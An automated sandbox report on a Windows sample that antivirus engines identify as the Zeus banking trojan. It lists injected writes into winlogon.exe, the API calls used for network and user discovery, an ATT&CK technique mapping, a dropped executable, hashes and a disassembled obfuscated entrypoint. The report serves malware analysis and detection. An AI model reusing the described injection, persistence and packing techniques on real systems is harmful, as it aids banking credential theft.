Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D496000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D4A0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D4A1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D4B2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D4B4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D4B6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D4C0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D4C1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D4D2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D4D4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D4D6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D4E0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D4E1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D4F2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D4F4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D4F6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D500000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D501000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D512000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D514000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D516000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D520000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D521000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D532000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D534000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D536000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D540000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D541000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D552000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D554000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D556000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D560000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D561000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D572000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D574000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D576000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D580000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D581000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D592000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D594000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D596000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_004105E8 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,0_2_004105E8
Source: Ue0N2amgcH.exe, 00000000.00000002.463822693.0000000000D90000.00000002.00000001.sdmp, winlogon.exe, 00000002.00000000.198836928.000002388D3F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: Ue0N2amgcH.exe, 00000000.00000002.463822693.0000000000D90000.00000002.00000001.sdmp, winlogon.exe, 00000002.00000000.198836928.000002388D3F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: Ue0N2amgcH.exe, 00000000.00000002.463822693.0000000000D90000.00000002.00000001.sdmp, winlogon.exe, 00000002.00000000.198836928.000002388D3F0000.00000002.00000001.sdmpBinary or memory string: Progman
Source: Ue0N2amgcH.exe, 00000000.00000002.463822693.0000000000D90000.00000002.00000001.sdmp, winlogon.exe, 00000002.00000000.198836928.000002388D3F0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_00409115 RtlAllocateHeap,CreateNamedPipeW,CreateEventW,CreateEventW,CloseHandle,CloseHandle,CloseHandle,WaitForSingleObject,0_2_00409115
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_0040B44D RtlAllocateHeap,CreateEventW,InternetQueryOptionA,InternetSetStatusCallback,InternetSetOptionA,InternetReadFileExA,GetLastError,DispatchMessageW,PeekMessageW,MsgWaitForMultipleObjects,ResetEvent,InternetSetOptionA,InternetSetStatusCallback,CloseHandle,InternetQueryOptionA,InternetCrackUrlA,GetSystemTime,wnsprintfW,GetSystemTime,InternetQueryOptionA,GetUrlCacheEntryInfoW,RtlEnterCriticalSection,RtlLeaveCriticalSection,0_2_0040B44D
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_00409475 HeapCreate,GetProcessHeap,RtlAllocateHeap,GetCurrentProcessId,IsBadHugeReadPtr,GetUserDefaultUILanguage,GetUserNameW,0_2_00409475
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_0040D054 GetTimeZoneInformation,0_2_0040D054
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_004106B9 GetTickCount,GetVersionExW,GetUserDefaultUILanguage,GetModuleFileNameW,0_2_004106B9
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_0040E457 socket,bind,closesocket,0_2_0040E457
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_0040E2D4 socket,bind,listen,closesocket,0_2_0040E2D4

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1Native API1Valid Accounts1Valid Accounts1Masquerading2Input Capture11System Time Discovery2Remote ServicesInput Capture11Exfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
Default AccountsScheduled Task/JobRegistry Run Keys / Startup Folder1Access Token Manipulation11Valid Accounts1LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Application Shimming1Process Injection42Virtualization/Sandbox Evasion1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder1Access Token Manipulation11NTDSProcess Discovery3Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptApplication Shimming1Process Injection42LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsInstall Root Certificate1DCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemSystem Information Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Ue0N2amgcH.exe90%VirustotalBrowse
Ue0N2amgcH.exe100%ReversingLabsWin32.Trojan.Zeus
Ue0N2amgcH.exe100%AviraTR/Crypt.ZPACK.Gen
Ue0N2amgcH.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Windows\SysWOW64\sdra64.exe100%AviraTR/Dropper.Gen
C:\Windows\SysWOW64\sdra64.exe100%Joe Sandbox ML

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
2.2.winlogon.exe.111a0000.580.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d6a0000.108.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.11e80000.683.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d1a0000.68.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10c20000.536.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d8a0000.124.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.11360000.594.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.fa60000.394.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.12600000.743.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10760000.498.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.127c0000.757.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d740000.113.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f440000.345.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.12da0000.804.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10fc0000.565.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.11780000.627.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.12d20000.800.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d1c0000.69.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.124c0000.733.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10800000.503.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.eaa0000.268.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e060000.186.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.fae0000.398.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.100c0000.445.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.12ac0000.781.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.dfa0000.180.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f260000.330.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.11ac0000.653.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.11180000.579.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e5e0000.230.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e480000.219.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.fa40000.393.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.11060000.570.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.dfe0000.182.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.fa80000.395.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.106c0000.493.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.11ce0000.670.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e660000.234.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e7c0000.245.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.11220000.584.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.ed20000.288.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f920000.384.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10de0000.550.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.fd20000.416.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.ebe0000.278.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d5a0000.100.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.fb80000.403.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.11080000.571.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.11ea0000.684.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.efa0000.308.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d2e0000.78.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f420000.344.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f540000.353.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.12a00000.775.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.12700000.751.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.12b40000.785.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.122a0000.716.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f580000.355.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e7e0000.246.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.11f20000.688.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.c960000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e360000.210.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d960000.130.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10160000.450.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e6e0000.238.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10da0000.548.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f9e0000.390.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f9a0000.388.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.db00000.143.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.11640000.617.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10c00000.535.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.11920000.640.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.eac0000.269.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10f20000.560.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10e60000.554.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.cfe0000.54.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.ce40000.41.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10620000.488.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d040000.57.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e9a0000.260.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.12360000.722.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.11c60000.666.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10f60000.562.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.11140000.577.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10960000.514.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.11b40000.657.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.ca00000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.102c0000.461.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.128e0000.766.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d880000.123.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.11d60000.674.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.cbc0000.21.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10720000.496.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d7a0000.116.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.df20000.176.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.efe0000.310.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10680000.491.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.114a0000.604.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.11ba0000.660.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://onlineeast#.bankofamerica.com/cgi-bin/ias/0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://onlineeast#.bankofamerica.com/cgi-bin/ias/Ue0N2amgcH.exe, 00000000.00000002.464238365.00000000023F3000.00000004.00000040.sdmpfalse
  • Avira URL Cloud: safe
low

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:31.0.0 Emerald
Analysis ID:381781
Start date:05.04.2021
Start time:02:57:32
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 25s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Ue0N2amgcH (renamed file extension from none to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:27
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:1
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.evad.winEXE@1/2@0/0
EGA Information:Failed
HDC Information:
  • Successful, ratio: 98.7% (good quality ratio 93.4%)
  • Quality average: 83.9%
  • Quality standard deviation: 27.7%
HCA Information:Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
Show All
  • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtWriteVirtualMemory calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Windows\SysWOW64\sdra64.exe
Process:C:\Users\user\Desktop\Ue0N2amgcH.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:modified
Size (bytes):439808
Entropy (8bit):7.486506470434463
Encrypted:false
SSDEEP:12288:tKLKS3ugwI5Z1BRzmWwP05WLNl6ZHkMR0xiDkAMf:tKLyg9vDRzmHP05Y6+iDkV
MD5:66E599A0E60235530CE34127717CBD69
SHA1:7E42442474AD8BAF2BD39EDBCD771728879194BF
SHA-256:6DFB5E87C7226012F130032F4F8F9B9A3C1193843A11F0C1418CA3654AD78A83
SHA-512:B7A0D723BD45E7037E1C53CC6E0FBC13906F3DDE598A9FCEAE8BA4057FD859B2416A4D37129568C306BE810E43D2FB5644EF66656BAC1C8202C06056CE55F245
Malicious:true
Antivirus:
  • Antivirus: Avira, Detection: 100%
  • Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:low
Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......77uQsV..sV..sV..V.).LV...0M.\V..`8..DV..mQ.."V...a...V.......V..j....V..RichsV..................................................................................PE..L...b..G.....................X....................@..........................p..................................................d....................................................................................................................text............................... ..`.rdata..............................@..@.data....P..........................@...........................................................................................................................................................................................................................................................................................................................................................
C:\Windows\SysWOW64\sdra64.exe:Zone.Identifier
Process:C:\Users\user\Desktop\Ue0N2amgcH.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:true
Reputation:high, very likely benign file
Preview: [ZoneTransfer]....ZoneId=0

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.18265444554369
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:Ue0N2amgcH.exe
File size:60928
MD5:ccb2db4a8a284f62db7002be470ac542
SHA1:b2bdb5ed1ff743117cdf8500a498e247febbb6ec
SHA256:4fb04b099a37aeae2f58685b8fb08bca298f8f68d5dfc45ceb9fa398e9f109ea
SHA512:1472e175170bb13173963b479cd90e304b58554908b27caa0e813c47eaf8f85ac3783ce9240cab70a2d6349840ea5069cf44196695f64fdddf1a68ba1ce68f29
SSDEEP:768:dtwaDQxDzRaaLoXfZ1yjpenwgb4uDAv5RhahPUCrjtrSfnnd8LCPCct8WL6pPlBa:puRuXzjh4k2gUgoPdNLYPba
File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......77uQsV..sV..sV..V.).LV...0M.\V..`8..DV..mQ.."V...a...V.......V..j....V..RichsV.................................................

File Icon

Icon Hash:00828e8e8686b000

Static PE Info

General

Entrypoint:0x4081b7
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:TERMINAL_SERVER_AWARE
Time Stamp:0x47DCEE62 [Sun Mar 16 09:54:42 2008 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:41da589848b0ea7c32b44ddd22d7ade5

Entrypoint Preview

Instruction
call 00007FC730833680h
xor edi, edi
mov esi, dword ptr [esp]
add esp, 04h
retn 0024h
xor esi, esi
push 00000000h
push 00BC7A6Dh
push 00000004h
push 00000000h
push 00CCBE13h
push 00000007h
push 00000000h
call dword ptr [00410084h]
and eax, 000000FDh
xor edx, edx
mov dl, al
add esi, edx
cmp esi, 3FFCD967h
jnl 00007FC730833674h
jmp 00007FC730833643h
mov bl, dl
xor eax, eax
mov eax, 0000F607h
add eax, 00088C23h
sub eax, 00088B52h
mov ecx, edx
sub esp, 04h
mov dword ptr [esp], ecx
sub esp, 04h
mov dword ptr [esp], 00000040h
sub esp, 04h
mov dword ptr [esp], 00003000h
push eax
push 00000000h
call dword ptr [0041007Ch]
pop ecx
mov ecx, esi
mov esi, dword ptr [esp]
mov edi, eax
add esi, 00000103h
sub esp, 04h
mov dword ptr [esp], eax
mov ecx, 000001DBh
mov edx, CE0E523Dh
mov ebp, 00000000h
mov bh, byte ptr [esi]
add bh, dl
sub esi, 000B54D0h
add esi, 000B54D1h
add bh, bl
mov byte ptr [edi], bh
inc edi
sub esp, 04h
mov dword ptr [esp], edx
push ecx
push 00000000h
push 00000007h
push 00000005h
push 00000000h
push 00000000h
push 008AF758h

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0x100f00x64.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x100000xa0.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000xe1f00xe200False0.886874308628data7.30372755134IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata0x100000x5080x600False0.509765625data4.76117916035IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data0x110000x50cb0x200False0.087890625data0.483984725135IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Imports

DLLImport
ole32.dllStgOpenStorageOnILockBytes, ReadClassStg, CoQueryProxyBlanket, OleLoad, PropVariantClear, WriteStringStream, StgCreateDocfileOnILockBytes, CoRegisterMessageFilter, CoGetCallerTID, StgOpenStorage
